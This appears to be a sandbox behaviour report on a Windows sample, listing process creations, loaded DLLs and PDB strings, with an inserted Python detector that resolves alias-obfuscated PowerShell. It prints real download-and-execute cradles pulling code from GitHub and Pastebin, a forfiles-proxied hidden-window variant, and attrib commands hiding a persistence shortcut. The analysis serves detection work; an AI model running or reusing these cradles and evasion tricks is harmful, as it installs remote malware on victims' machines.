Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
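The process-creation rows above show two download-and-execute cradles. The first stage is the plain `iex(iwr raw.githubusercontent.com/... -usebasicparsing)` launched by the sample. The persistence stage is proxied through `forfiles.exe /p c:\windows\system32 /m notepad.exe /c ...`, which runs its `/c` command once for the single matching file and so serves only as an unexpected parent for powershell.exe, and the cradle itself is hidden behind `Set-Alias` (`sal`): `sal callit iEx` makes `callit` an alias for Invoke-Expression, and `sal $env:os iWr` registers an alias whose name is the value of `$env:OS`, which is `Windows_NT` on every Windows host. Since PowerShell alias lookup is case-insensitive, `calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)` is simply `Invoke-Expression(Invoke-WebRequest ...)`. The `sal fatbake calc` definition is noise that is never used. The Python below is an added example, not code from this report or from the sample: it resolves such alias definitions in a process-creation command line and flags the indicators a detection rule would key on. The event dict shape and the three sample events (built from the command lines listed above) are constructed for the example; `ENV` holds only the one variable the cradle references.

```python
"""Resolve alias-obfuscated PowerShell cradles and flag the indicators seen in
this report's process tree. Added example; not code from the report or sample."""
import re
from dataclasses import dataclass, field

# Built-in PowerShell aliases relevant to download cradles (lookup is
# case-insensitive, as in PowerShell itself).
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# $env:OS is "Windows_NT" on every Windows host, which is what turns
# `sal $env:os iWr` into an alias named WINDOWS_NT for Invoke-WebRequest.
ENV = {"os": "Windows_NT"}

# `sal NAME TARGET` / `Set-Alias NAME TARGET`; NAME may be an env reference.
SET_ALIAS_RE = re.compile(r"\b(?:sal|set-alias)\s+(\$env:\w+|[\w.]+)\s+([\w-]+)", re.I)
TOKEN_RE = re.compile(r"[A-Za-z_][\w-]*")
PASTE_HOST_RE = re.compile(r"\b(?:pastebin\.com|raw\.githubusercontent\.com)\b", re.I)
CRADLE_RE = re.compile(r"invoke-expression\s*\(\s*invoke-webrequest", re.I)


@dataclass
class Finding:
    parent: str
    resolved: str
    indicators: list = field(default_factory=list)


def expand_env(token: str) -> str:
    """Replace a $env:NAME reference with its value from ENV (assumed table)."""
    m = re.fullmatch(r"\$env:(\w+)", token, re.I)
    return ENV.get(m.group(1).lower(), token) if m else token


def resolve_aliases(cmd: str):
    """Return (alias table, command with alias definitions removed and uses expanded)."""
    table = dict(BUILTIN_ALIASES)
    for name, target in SET_ALIAS_RE.findall(cmd):
        # the target may itself be an alias (`sal callit iEx`), so chase it once
        table[expand_env(name).lower()] = table.get(target.lower(), target)
    body = SET_ALIAS_RE.sub("", cmd)
    expanded = TOKEN_RE.sub(lambda m: table.get(m.group(0).lower(), m.group(0)), body)
    # collapse the empty statements left behind by the removed definitions
    return table, re.sub(r"[\s;]*;[\s;]*", ";", expanded).strip("; ")


def analyze(event: dict) -> Finding:
    """event = {'parent': image path, 'cmdline': command line}; constructed shape."""
    table, resolved = resolve_aliases(event["cmdline"])
    f = Finding(parent=event["parent"], resolved=resolved)
    low = event["cmdline"].lower()
    if f.parent.lower().endswith("forfiles.exe"):
        f.indicators.append("lolbin_proxy_parent")      # forfiles /c used as a launcher
    if re.search(r"-windowstyle\s+h", low):
        f.indicators.append("hidden_window")
    if any(t in BUILTIN_ALIASES.values() and n not in BUILTIN_ALIASES
           for n, t in table.items()):
        f.indicators.append("custom_alias_for_iex_or_iwr")
    if PASTE_HOST_RE.search(low):
        f.indicators.append("paste_site_download")
    if CRADLE_RE.search(resolved):
        f.indicators.append("download_and_execute_cradle")
    if "attrib" in low and "+h" in low and ".lnk" in low:
        f.indicators.append("hidden_autostart_lnk")     # attrib +s +h on a shortcut
    return f


def scan(events):
    return [analyze(e) for e in events]


# Sample events constructed from the process-creation rows in this report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\OSLdZanXNc.exe",
     "cmdline": "powershell.exe -command start powershell -windowstyle h -args "
                "{iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera"
                "/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}"},
    {"parent": r"C:\Windows\System32\forfiles.exe",
     "cmdline": "-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; "
                "sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\system32\attrib.exe" +s +h '
                r'"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.parent, f.indicators, f.resolved, sep="\n  ")
```

Resolving aliases before matching is the point: a rule that only looks for the literal strings `iex` or `Invoke-WebRequest` never fires on the forfiles stage, while the resolved form exposes the same `Invoke-Expression(Invoke-WebRequest pastebin.com/...)` cradle as the first stage. The token rewrite is deliberately naive (it does not parse PowerShell), so treat it as an enrichment step for triage rather than a parser.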
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Section loaded: apphelp.dll, vcruntime140.dll, kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: BeginSync.lnk.4.dr LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: OSLdZanXNc.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OSLdZanXNc.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OSLdZanXNc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601444821.000002422026F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2601063159.00000242201FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbpr source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089" source: powershell.exe, 00000004.00000002.2602273383.000002422061C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbB source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2602668444.0000024220629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbv source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbw source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb? source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA59A source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: ws\dll\System.Management.Automation.pdb| source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: OSLdZanXNc.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
